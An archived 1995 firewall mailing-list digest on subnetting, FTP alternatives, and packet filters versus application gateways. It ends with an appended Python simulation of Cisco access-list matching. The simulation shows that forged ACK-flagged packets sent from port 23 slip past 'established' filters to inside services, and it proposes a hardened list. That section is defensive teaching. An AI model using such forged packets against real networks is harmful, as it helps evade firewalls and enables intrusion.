>> Yannick Gravel
>> System administrator -- yannick.gravel@planet-int.net
>>
>
>This is a FAQ about a confusing subject. The IP RFC states that
>the all ones and all zeroes subnets are illegal. I recommend
>not using them.
>
>They will work in some circumstances, but can cause obscure
>problems later. A pair of simple examples:
>
> 172.31.0.0
> 172.31.0.0
>
>One is subnet zero of network 172.31.0.0, the other is the whole
>network. Which is which?
>
> 172.31.255.255
> 172.31.255.255
>
>One is the broadcast for the whole network; the other is the
>broadcast for subnet 255. Again, which is which?
>
>You may say that it's easy enough to figure this out if you know
>the subnet mask. "Classful" routing protocols such as RIP and
>IGRP, however, don't transmit the mask in routing updates. If
>the receiving host or router doesn't have another way to learn
>the mask, it can't interpret the address and is likely to have
>a problem with the all zeroes and all ones subnets.
> >Classless routing protocols such as OSPF, EIGRP, and Integrated >IS-IS do send mask information, so in principle they can >support the all zeroes and all ones subnets. Problems can occur, >however, if they have to export such an address into a classful >routing environment. > >Some routers will let you configure these subnets, others will >never allow it. Cisco lets you do it only if you explicitly >configure it; it will give you a %bad mask diagnostic if not. > >Howard > Andrew Foss Tel. 415/494-NETS(6387) Network Translation Inc. Dir. 415/855-0725 1901 Embarcadero Rd. FAX 415/424-9110 Palo Alto, CA 94303 email afoss@translation.com web www.translation.com From firewalls-owner Fri Oct 13 10:14:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA06923 for firewalls-outgoing; Fri, 13 Oct 1995 10:06:53 -0700 Received: from dewey.umi.com (dewey.umi.com [192.195.245.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA06916 for ; Fri, 13 Oct 1995 10:06:50 -0700 Received: from namer.umi.com by dewey.umi.com with smtp (Smail3.1.28.1 #17) id m0t3nah-0008nSC; Fri, 13 Oct 95 13:08 EDT Received: from pdoffice.umi.com by namer.umi.com with smtp (Smail3.1.28.1 #16) id m0t3nQC-0004w3C; Fri, 13 Oct 95 12:57 EDT Received: by pdoffice.umi.com (Smail3.1.28.1 #15) id m0t3nPW-000CWpC; Fri, 13 Oct 95 12:56 EDT Message-Id: Date: Fri, 13 Oct 95 12:56 EDT From: "TMOONEY.UMI.COM" To: Chris.Brenton@newsedge.com Subject: Re: Port question Cc: firewalls@greatcircle.com X-Orcl-Application: In-Reply-To:ORAMAIL.UMI.COM:firewalls-owner@GreatCircle.COM's message of 11-Oct-95 20:15 X-Orcl-Content-Type: multipart/mixed; boundary=Boundary-112613-0-0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk --Boundary-112613-0-0 Netscape Secure Commerce Servers recommend using port 443 for https connections. 
Tom --Boundary-112613-0-0 X-Orcl-Content-Type: message/rfc822 Received: 11 Oct 1995 20:30:29 Sent: 11 Oct 1995 20:23:21 From:"Chris Brenton" To: firewalls@GreatCircle.COM Subject: Port question Reply-to: Chris.Brenton@newsedge.com X-Orcl-Application: Mime-Version: 1.0 X-Orcl-Application: Content-Type: text/plain; charset=us-ascii X-Sender: X-Mailer: X-Orcl-Application: Sender: firewalls-owner@GreatCircle.COM X-Orcl-Application: Precedence: bulk

Does anyone know what port 443 is used for? Check out: http://necxdirect.necx.com You're passed to port 8002 and then 443. Does anyone see any problems with opening up port 443 access to the net? Thanks for any help!

--Boundary-112613-0-0-- From firewalls-owner Fri Oct 13 10:35:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA07141 for firewalls-outgoing; Fri, 13 Oct 1995 10:17:51 -0700 Received: from cseic.saic.com (CSEIC.SAIC.COM [139.121.32.135]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA07134 for ; Fri, 13 Oct 1995 10:17:46 -0700 Received: from [139.121.32.149] by cseic.saic.com (4.1/1.34) id AA15587; Fri, 13 Oct 95 13:12:20 EDT Message-Id: <9510131712.AA15587@cseic.saic.com> X-Sender: steveg@cseic.saic.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 13 Oct 1995 13:24:11 -0400 To: Scott Barman From: "Stephen H. Goldstein" Subject: Re: Various FTPs Cc: padgett@tccslr.dnet.mmc.com, firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

At 11:18 AM 10/13/95 -0400, Scott Barman wrote:
>On Thu, 12 Oct 1995 padgett@tccslr.dnet.mmc.com wrote:
>
>> I agree with Marcus concerning the problems in FTP & possibly IPV6
>> will repair/replace it. For now I suspect that the answer is a
>
>I have been "observing" the output of the IETF for IPv6 and have seen
>nothing regarding changing ftp. It seems their concerns are a larger
>address space and security.
I don't think I'm alone in my desire to see >something replace it and, as Marcus Ranum said about himself in a previous >note, I'm not "big" enough to try to force a change! > >scott barman >-- Question 1: I'm curious as to why one would even bother with modifying FTP to use a different port. If it's so bad, why not serve up your files via Gopher or HTTP? Are they worse? Question 2: Assuming that in the interest of protecting themselves everyone mods their FTP servers using approaches similar to IWI and Microsoft, how much risk to systems on the client side is added by loosening filters to compensate? --- Stephen Goldstein steveg@cseic.saic.com My first computer: A 24K Atari 800, Rev. A ROMS, November 1980 Disclaimer: That's not what I said. From firewalls-owner Fri Oct 13 11:14:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA08329 for firewalls-outgoing; Fri, 13 Oct 1995 11:06:31 -0700 Received: from sequoia.itd.uts.EDU.AU (sequoia.itd.uts.EDU.AU [138.25.16.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA08314 for ; Fri, 13 Oct 1995 11:06:22 -0700 Received: from lordmuck.itd.uts.edu.au by sequoia.itd.uts.EDU.AU with SMTP id AA24529 (5.65c/IDA-1.4.4 for ); Sat, 14 Oct 1995 04:04:26 +1000 Received: (from matt@localhost) by lordmuck.itd.uts.edu.au (8.7.1/8.7/Jas) id EAA04335 for firewalls@greatcircle.com; Sat, 14 Oct 1995 04:06:40 +1000 (EST) From: Jas (Matthew K) Message-Id: <199510131806.EAA04335@lordmuck.itd.uts.edu.au> Subject: Re: Various FTPs To: firewalls@greatcircle.com (Firewalls Mailing List) Date: Sat, 14 Oct 1995 04:06:40 +1000 (EST) In-Reply-To: from "Scott Barman" at Oct 13, 95 11:18:13 am X-Gcb: -----BEGIN GEEK CODE BLOCK----- X-Gcb: Version: 3.1 X-Gcb: GAT/M/CS d-(++) s++:-- a-(?) 
C+++$ UVS++++$ P+++ L+ E++ W++ N++ X-Gcb: !o K+ w--- O+ M+ V-- PS+ PE+ Y+ PGP++ t+ 5+ X++ R tv- b++ DI+ X-Gcb: D+ e h- r !y X-Gcb: ------END GEEK CODE BLOCK------ X-Ph: ph: +61 2 330 1390 fax: +61 2 330 1999 home: +61 2 9929 0717 X-Pager: +61 2 214 1111 #849482 or 849482@pager.link.com.au X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Scott Barman wrote this...
> On Thu, 12 Oct 1995 padgett@tccslr.dnet.mmc.com wrote:
>> I agree with Marcus concerning the problems in FTP & possibly IPV6
>> will repair/replace it. For now I suspect that the answer is a
> I have been "observing" the output of the IETF for IPv6 and have seen
> nothing regarding changing ftp. It seems their concerns are a larger
> address space and security. I don't think I'm alone in my desire to see
> something replace it and, as Marcus Ranum said about himself in a previous
> note, I'm not "big" enough to try to force a change!

Well, why don't we put our collective heads together and make a firewall-friendly file transfer protocol? Then we can have people write up the code on different platforms (we have enough knowledge here for almost every possible conceivable platform), and GPL the stuff. Well? Any takers? Myself personally, I'm in.

Matt -- #!/bin/sh echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit Matthew Keenan Systems Programmer Information Technology Division University of Technology Sydney Australia It's nice to be in a position where people apologize because they assume there's humor in your work, based on past experience, but they're not sure where it is.
-- Rob Pike From firewalls-owner Fri Oct 13 12:31:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA10693 for firewalls-outgoing; Fri, 13 Oct 1995 12:21:10 -0700 Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA10686 for ; Fri, 13 Oct 1995 12:21:06 -0700 Received: from uucp5.UU.NET by relay3.UU.NET with SMTP id QQzlht19822; Fri, 13 Oct 1995 15:19:17 -0400 Received: from vanguard.UUCP by uucp5.UU.NET with UUCP/RMAIL ; Fri, 13 Oct 1995 15:19:18 -0400 Received: by vanguard.hmp.com (UUPC/extended 1.12b); Fri, 13 Oct 1995 11:35:00 MDT Date: Fri, 13 Oct 1995 11:34:59 MDT From: "Scott Deshaies" Message-ID: <307ea344.vanguard@vanguard.hmp.com> Organization: High Mountain Press, Inc. To: firewalls@greatcircle.com Subject: Re: Various FTPs Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Fri, 13 Oct 1995 11:18:13 -0400 (EDT), "Scott Barman" wrote:
> ... I don't think I'm alone in my desire to see
> something replace it and, as Marcus Ranum said about himself in a previous
> note, I'm not "big" enough to try to force a change!

How about 15,000 Firewalls readers? ;) I think if Marcus added a new FTP daemon to the FWTK, we would love to implement it alongside our old FTP connections until it became a de facto standard. Add in the FWTK-User readers, and I think we could be "big" enough over time. If we are the ones to control access to the Internet, we can help dictate its use, right?

-- >> Scott R. Deshaies <> High Mountain Press, Inc.
<< >> MIS Manager <> 2530 Camino Entrada * Santa Fe, NM 87505 << >> sdeshaies@hmp.com <> Direct:505/474-5103 http://www.hmp.com << From firewalls-owner Fri Oct 13 12:43:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11002 for firewalls-outgoing; Fri, 13 Oct 1995 12:29:23 -0700 Received: from erenj.com (ereapp.ERENJ.COM [159.70.31.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA10990 for ; Fri, 13 Oct 1995 12:29:19 -0700 Received: from eredns.erenj.com(159.70.1.252) by ereapp.erenj.com via smap (V1.3) id sma013493; Fri Oct 13 15:26:46 1995 Posted-Date: Fri, 13 Oct 1995 15:26:41 -0400 Date: Fri, 13 Oct 1995 15:26:41 -0400 (EDT) From: "Bryan D. Boyle" Subject: Re: Firewall1 Comparison To: "Sacherich, Larry" Cc: "'Firewalls-Digest-L'" , "'Walt Herrmann'" In-Reply-To: <199510131532.AA08563@gateway.ppg.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

There is also a page with most of the firewall contact information on the web at: http://www.access.digex.net/~bdboyle/firewall.vendor.html if anyone is interested.

Bryan D. Boyle | EMAIL: bdboyle@erenj.com 908-730-3338 | PAGE: bboyle@apt1.pagemart.com #include | http://www.access.digex.net/~bdboyle/index.html "It seems that 'national security' is the root password to the Constitution. As with any dishonest superuser, the best countermeasure is strong encryption." -Phil Karn

On Fri, 13 Oct 1995, Sacherich, Larry wrote:
>
> Walt,
>
> Every security book or white paper that I have read indicates
> that an application level gateway is the best form of security.
> It goes a step beyond just packet filtering. You would be well
> advised to at least talk to firewall vendors like ANS, TIS, and
> BorderWare.
>
> ANS 800-456-8267 info@ans.net http://www.ans.net/
> TIS 301-854-6889 avolio@tis.com http://www.tis.com/
> Net- 800-723-1166 sales@netpart.com http://www.netpart.com
> Partners
>
>
> Larry Sacherich
> sacherich@ppg.com
>
> Comments are my personal opinion, and not that of PPG Industries.
>

From firewalls-owner Fri Oct 13 13:02:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11764 for firewalls-outgoing; Fri, 13 Oct 1995 12:47:37 -0700 Received: from nda.nda.com (fw1.nda.COM [204.57.47.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA11750 for ; Fri, 13 Oct 1995 12:47:33 -0700 Received: (kovar@localhost) by nda.nda.com (8.6.11/8.6.4) id PAA20036; Fri, 13 Oct 1995 15:45:33 -0400 From: David Kovar Message-Id: <199510131945.PAA20036@nda.nda.com> Subject: Re: Firewall1 Comparison -Reply To: dkaye@rds.com (Doug Kaye) Date: Fri, 13 Oct 1995 15:45:33 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Doug Kaye" at Oct 13, 95 08:34:21 am X-Mailer: ELM [version 2.4 PL20] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 713 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> I'm seeing a lot of discussion on packet filters vs. application gateways. Does it make
> sense to implement both? Is it too expensive or overkill? If you implement both, where
> does the filter go -- on the public side of the application gateway? Is it possible to run both
> on the same hardware?

FW-1 includes application gateways for FTP and telnet while doing everything else with a dynamic packet filtering scheme. This puts both on the same hardware. It is common to use a router in conjunction with a host running an application gateway. If you put access lists into the router, you are now running packet filters and application gateways. I'm all for defense in depth in most situations.
-David From firewalls-owner Fri Oct 13 13:15:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA12603 for firewalls-outgoing; Fri, 13 Oct 1995 13:07:21 -0700 Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA12596 for ; Fri, 13 Oct 1995 13:07:18 -0700 Received: (pferguso@localhost) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) id NAA28793; Fri, 13 Oct 1995 13:05:28 -0700 From: Paul Ferguson Message-Id: <199510132005.NAA28793@lint.cisco.com> Subject: Re: Firewall1 Comparison -Reply To: dkaye@rds.com (Doug Kaye) Date: Fri, 13 Oct 95 13:05:28 PDT Cc: firewalls@GreatCircle.COM In-Reply-To: ; from "Doug Kaye" at Oct 13, 95 8:34 am X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Quite frankly, it makes very good sense to do both; overlapping security mechanisms is usually a Good Thing.

- paul

>
> I'm seeing a lot of discussion on packet filters vs. application gateways. Does it make
> sense to implement both? Is it too expensive or overkill? If you implement both, where
> does the filter go -- on the public side of the application gateway? Is it possible to run both
> on the same hardware?
>
> ============================================================
> Doug Kaye Rational Data Systems, Novato, CA
> Tel:415-382-8400 FAX:415-382-8441 http://www.rds.com
>
>

-- Paul Ferguson || || cisco Systems || || Consulting Engineering |||| |||| pferguso@cisco.com ..:||||||:..:||||||:..
c i s c o S y s t e m s From firewalls-owner Fri Oct 13 14:04:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA14223 for firewalls-outgoing; Fri, 13 Oct 1995 13:46:24 -0700 Received: from kcpgw.kcp.com (kcpgw.kcp.com [198.62.69.65]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA14216 for ; Fri, 13 Oct 1995 13:46:19 -0700 Received: by kcpgw.kcp.com id AA12964 (InterLock SMTP Gateway 3.0 for firewalls@GreatCircle.COM); Fri, 13 Oct 1995 15:44:23 -0500 Message-Id: <199510132044.AA12964@kcpgw.kcp.com> Received: by kcpgw.kcp.com (Protected-side Proxy Mail Agent-1); Fri, 13 Oct 1995 15:44:23 -0500 Mime-Version: 1.0 Date: Fri, 13 Oct 1995 15:22:46 -0500 From: dharris@kcp.com (Delmer Harris) Subject: Re[2]: Firewall1 Comparison -Reply To: firewalls@GreatCircle.COM, Doug Kaye Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Non-authoritative reply: Yes, it makes sense to implement both if what you are protecting is worth the cost in $ and in people.

I do both, sort of, by having a router outside (public side) of my firewall gateway proxy host machine (fgph). The router filters out incoming packets unless they are SMTP (it acts as a packet filter), thus helping me implement our security policy of "no incoming except SMTP." This makes it harder to attempt to crack my fgph.

I did not implement both functions on the same machine, partly because the fgph I bought does not provide packet filtering, partly because I like the division of labor. If my router is compromised (hard, with no interaction permitted except from the console port) I still have my fgph. If my fgph is not quite right it is still protected from outside attacks.

dharris@kcp.com Delmer D. Harris "I talk to the trees, but they don't listen to me" even though I speak for myself, not my employer.
______________________________ Reply Separator _________________________________ Subject: Re: Firewall1 Comparison -Reply Author: Doug Kaye at KCD-SMTP Date: 10/13/95 8:34

I'm seeing a lot of discussion on packet filters vs. application gateways. Does it make sense to implement both? Is it too expensive or overkill? If you implement both, where does the filter go -- on the public side of the application gateway? Is it possible to run both on the same hardware?

============================================================ Doug Kaye Rational Data Systems, Novato, CA Tel:415-382-8400 FAX:415-382-8441 http://www.rds.com

From firewalls-owner Fri Oct 13 15:20:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA16025 for firewalls-outgoing; Fri, 13 Oct 1995 14:59:54 -0700 Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA16016 for ; Fri, 13 Oct 1995 14:59:51 -0700 Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id QAA02944; Fri, 13 Oct 1995 16:52:12 -0500 Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr) id sma002922; Fri Oct 13 16:51:59 1995 Received: from ernie.bridge.com by ignatz.bridge.com with SMTP id AA24531 (5.67b/IDA-1.5); Fri, 13 Oct 1995 17:02:59 -0500 Date: Fri, 13 Oct 1995 17:02:59 -0500 From: Ken Hardy Message-Id: <199510132202.AA24531@ignatz.bridge.com> To: steveg@cseic.saic.com Subject: Re: Various FTPs Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

[I've been working on this response most of the afternoon between lengthy disruptions -- it's probably not worth the wait. ;-) ]

"Stephen H. Goldstein" wrote:
>Question 1:
>I'm curious as to why one would even bother with modifying FTP to use a
>different port. If it's so bad, why not serve up your files via Gopher
>or HTTP? Are they worse?
As a user, I prefer HTTP to FTP when fetching things. But what are the system ramifications; how does HTTP compare to FTP & its implementations in terms of system resources for a large site? Being stateless, it requires a new TCP connection for each click, and current implementations spawn a separate process for each connection. FTP requires a new connection every time you send a new directory listing back, doesn't it? Also, I don't know how current HTTP server implementations can control the load on a server a la some ftpd's user limits. What I do like about FTP for a loaded site is that, once you get a connection, it's yours 'till you log off. With a load-throttled httpd disallowing 4 out of 5 of your connection attempts, it would be a lot harder to navigate a site, which is why I don't use my browser's built-in FTP for popular servers.

HTTP might do for an outgoing-only anonymous FTP replacement. But HTTP is unidirectional; I can set up an FTP server to allow people to send me files, but not so with HTTP, and I can configure an FTP server to change the modes on received files so that even the sender cannot access them again. Anyone could conceivably fetch the file off my friend's HTTP server meant for me, passwords notwithstanding.

>Question 2:
>Assuming that in the interest of protecting themselves everyone mods
>their FTP servers using approaches similar to IWI and Microsoft, how
>much risk to systems on the client side is added by loosening filters
>to compensate?

I'm looking forward to others' analysis of this. Seems that HTTP ought to be able to be pretty secure, esp. if you'd only allow GET methods and code against buffer overruns in the URLs. If you want to use non-anon passwords, it doesn't require any sort of actual account on the machine, and is slightly (_very_ slightly; hardly worth mentioning) more secure in that the passwords are not entirely plaintext, a la FTP. What sort of protocol-level shenanigans are possible, though? And to what degree does SSL &c.
mitigate the problems?

-KH (Don't know squat about gopher and am waiting for others to comment.)

From firewalls-owner Fri Oct 13 15:30:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA15835 for firewalls-outgoing; Fri, 13 Oct 1995 14:51:13 -0700 Received: from wabash.iac.net (wabash.iac.net [198.180.60.138]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA15828 for ; Fri, 13 Oct 1995 14:51:09 -0700 Received: by wabash.iac.net id RAA09521; Fri, 13 Oct 1995 17:48:54 -0400 Date: Fri, 13 Oct 1995 17:48:52 -0400 (EDT) From: Carl Jolley To: Alan Hannan cc: Frederick M Avolio , firewalls@GreatCircle.COM Subject: Re: Firewall1 Comparison In-Reply-To: <199510131538.KAA17838@gaijin.mid.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Fri, 13 Oct 1995, Alan Hannan wrote:
> ......... Frederick M Avolio is rumored to have said:
> ]
> ] >>Application gateways are more secure.
> ] >
> ] >This statement is perhaps too strong.
> ]
> ] Indeed, I am being dogmatic, in my loveable way. :-)
>
> Indeed, though we may argue on adverbs.
>
> IMHO saying Application Gateways are more secure is a very true
> statement. How about this one? "Adding more services makes one
> more likely to have security problems", or "A policy of that which
> is not allowed is denied is more secure than a policy of that which
> is not disallowed is allowed."
>
> While I can find a secure firewall that has more services
> than an insecure one in _general_ the rule is true. Likewise, a
> firewall with 'not allowed denied' is not necessarily more secure
> than a firewall with 'not denied allowed'.
>

You are correct about "not necessarily more secure"; however, if you agree that any mechanism that is set up by a human is subject to human errors, I believe that 'not denied allowed' would tend to fall victim to errors of omission, i.e.
someone did not realise that a certain service, certain port, etc. was dangerous so they did not disallow it. I believe that the concept of 'not allowed denied' is safer because it requires a positive action to allow something rather than rely on the people who are configuring software/hardware to know everything AND remember everything when they are doing it. That certainly does not mean that someone could not decide to allow or permit a service that, in consideration for their security policy, they should not have. It does mean however that "I forgot" becomes a much less acceptable excuse. I believe it's always easier to hold someone accountable for what they did do rather than for what they did not do. The population of the choices of the former tends to be limited and finite while the population of the choices of the latter tends to the infinite.

I believe that which side of this question one comes down on is indicative of one's general approach to security or, said another way, one's level of paranoia. From the standpoint of an organizational or corporate perspective the answer to this question probably is heavily correlated to how valuable the "family jewels" are.

> My point, dealing with the packet in and of itself, as opposed to
> based upon the mac/tcp/ip/udp headers is significantly more
> secure, generally speaking.
> --
> Alan Hannan http://www.mid.net/~alan 402/472-0239
> Network Systems/Security Administrator MIDnet, Inc.
> **** cjolley@iac.net **** All opinions are my own and not necessarily those of my employer **** From firewalls-owner Fri Oct 13 16:31:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA17355 for firewalls-outgoing; Fri, 13 Oct 1995 16:18:42 -0700 Received: from csc.com (explorer.csc.com [20.1.10.27]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA17348 for ; Fri, 13 Oct 1995 16:18:39 -0700 Received: by csc.com (Smail3.1.29.1 #1) id m0t3tLJ-000iD8C; Fri, 13 Oct 95 19:16 EDT Date: Fri, 13 Oct 1995 19:16:45 -0400 (EDT) From: Adam Safier To: Firewalls@GreatCircle.COM cc: yg@muturl.planet-int.net Subject: Re: Firewalls-Digest V4 #586 In-Reply-To: <199510120316.UAA22448@miles.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We do lots of OSPF routing with variable size subnets and I never lost a subnet. Adam S. > > From: Yannick Gravel > But, some are saying that I can use all subnet; but others are > saying that we lose the first and last subnet... 
> > System administrator -- yannick.gravel@planet-int.net > From firewalls-owner Fri Oct 13 16:43:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA17326 for firewalls-outgoing; Fri, 13 Oct 1995 16:16:50 -0700 Received: from teal.csn.net (teal.csn.net [199.117.27.22]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA17319 for ; Fri, 13 Oct 1995 16:16:45 -0700 Received: (from surguine@localhost) by teal.csn.net (8.6.12/8.6.9) id QAA11994; Fri, 13 Oct 1995 16:30:50 -0600 Date: Fri, 13 Oct 1995 16:30:50 -0600 From: Scott Surguine Message-Id: <199510132230.QAA11994@teal.csn.net> To: firewalls@greatcircle.com Subject: Question: Telnet & Packet Filtering Cc: surguine@teal.csn.net Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hello Folks,

I am trying to build a packet filter on a Cisco 2501 running IOS 10.2:

I would like to allow telnet OUTGOING ONLY across the Cisco. Which is the best way to accomplish this?

I) Scenario #1

interface serial0
ip address XXX.XXX.XXX.XX XXX.XXX.XXX.X
ip access-group 100 in

access-list 100 permit tcp 0.0.0.0 255.255.255.255 XXX.XXX.XXX.X 0.0.0.255 established

II) Scenario #2

interface serial0
ip address XXX.XXX.XXX.XX XXX.XXX.XXX.X
ip access-group 100 in

access-list 100 permit tcp 0.0.0.0 255.255.255.255 206.104.1.0 0.0.0.255 gt 1023 established

What is confusing me is this: I have mainly in the past only used router platforms that filtered on the outgoing interface. I believe the second Scenario to be the better of the two but would prefer a second opinion.
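An added example, not part of Scott's question or of any reply in this thread: a small Python model of how an inbound IOS extended access-list decides each packet, used to compare the two scenarios above. It models only what the question needs: wildcard-mask address matching, the eq/gt/lt port operators, the `established` keyword (which matches any TCP segment with ACK or RST set and keeps no connection state), first match wins, and the implicit deny at the end of every list. The 206.104.1.0/24 inside prefix is taken from Scenario 2 and assumed for Scenario 1 as well; the sample packets are constructed for illustration, with 192.0.2.10 standing in for an outside host. Two further lists, one that also insists the reply come from source port 23 and one that adds an explicit deny for tcp/6000 ahead of the permit, show what a source-port restriction does and does not buy when the outside host chooses its own source port.

```python
"""Added example: simulate Cisco IOS extended access-list matching for TCP."""
import ipaddress
from dataclasses import dataclass
from typing import Optional, Tuple

PortOp = Optional[Tuple[str, int]]   # ("eq", 23), ("gt", 1023), or None for any port


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False
    ack: bool = False
    rst: bool = False


@dataclass(frozen=True)
class Entry:
    """One `access-list N permit|deny tcp SRC WILD [op] DST WILD [op] [established]` line."""
    action: str
    src: str
    src_wild: str
    src_op: PortOp
    dst: str
    dst_wild: str
    dst_op: PortOp
    established: bool = False


def addr_matches(addr: str, base: str, wildcard: str) -> bool:
    """Cisco wildcard semantics: a 1 bit in the wildcard means 'don't care'."""
    a = int(ipaddress.IPv4Address(addr))
    b = int(ipaddress.IPv4Address(base))
    care = ~int(ipaddress.IPv4Address(wildcard)) & 0xFFFFFFFF
    return (a & care) == (b & care)


def port_matches(port: int, op: PortOp) -> bool:
    if op is None:
        return True
    name, value = op
    return {"eq": port == value, "gt": port > value, "lt": port < value}[name]


def entry_matches(entry: Entry, pkt: Packet) -> bool:
    if not addr_matches(pkt.src, entry.src, entry.src_wild):
        return False
    if not addr_matches(pkt.dst, entry.dst, entry.dst_wild):
        return False
    if not port_matches(pkt.sport, entry.src_op):
        return False
    if not port_matches(pkt.dport, entry.dst_op):
        return False
    # `established` inspects flags only; the router keeps no connection table.
    if entry.established and not (pkt.ack or pkt.rst):
        return False
    return True


def evaluate(acl, pkt: Packet) -> str:
    """First matching entry wins; every access-list ends with an implicit deny."""
    for entry in acl:
        if entry_matches(entry, pkt):
            return entry.action
    return "deny"


ANY = ("0.0.0.0", "255.255.255.255")
INSIDE = ("206.104.1.0", "0.0.0.255")          # assumed inside prefix, from Scenario 2

# Scenario 1: access-list 100 permit tcp any 206.104.1.0 0.0.0.255 established
SCENARIO_1 = [Entry("permit", *ANY, None, *INSIDE, None, established=True)]
# Scenario 2: access-list 100 permit tcp any 206.104.1.0 0.0.0.255 gt 1023 established
SCENARIO_2 = [Entry("permit", *ANY, None, *INSIDE, ("gt", 1023), established=True)]
# Scenario 2 plus "reply must come from port 23" (the outside host picks its own source port)
SCENARIO_2_FROM_23 = [Entry("permit", *ANY, ("eq", 23), *INSIDE, ("gt", 1023), established=True)]
# Scenario 2 with an explicit deny for X11 (tcp/6000 is > 1023) placed before the permit
HARDENED = [Entry("deny", *ANY, None, *INSIDE, ("eq", 6000)),
            Entry("permit", *ANY, None, *INSIDE, ("gt", 1023), established=True)]

# Constructed sample packets arriving inbound on serial0.
TELNET_REPLY = Packet("192.0.2.10", 23, "206.104.1.5", 1025, ack=True)      # return half of an outgoing telnet
INBOUND_TELNET_SYN = Packet("192.0.2.10", 40000, "206.104.1.5", 23, syn=True)  # someone telnetting in
ACK_PROBE_SMTP = Packet("192.0.2.10", 23, "206.104.1.5", 25, ack=True)      # forged: source port 23, ACK set
ACK_PROBE_X11 = Packet("192.0.2.10", 23, "206.104.1.5", 6000, ack=True)     # same trick aimed at X11


if __name__ == "__main__":
    lists = [("scenario 1", SCENARIO_1), ("scenario 2", SCENARIO_2),
             ("scenario 2 + eq 23", SCENARIO_2_FROM_23), ("hardened", HARDENED)]
    packets = [("telnet reply", TELNET_REPLY), ("inbound telnet SYN", INBOUND_TELNET_SYN),
               ("ACK probe to smtp", ACK_PROBE_SMTP), ("ACK probe to X11", ACK_PROBE_X11)]
    for name, acl in lists:
        for label, pkt in packets:
            print(f"{name:20} {label:20} -> {evaluate(acl, pkt)}")
```

Both scenarios pass the legitimate reply and drop a bare inbound SYN. Scenario 1 also passes any ACK-flagged segment to any inside port, including 25; the gt 1023 clause in Scenario 2 stops that for the reserved ports but not for higher-numbered services such as 6000, which is why the hardened list denies it explicitly ahead of the permit. Insisting that replies come from source port 23 changes nothing for an outside host that simply sends from port 23. None of these lists gives the router any memory of which connections exist; that is what the kernel behind it, or a stateful proxy, has to provide.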
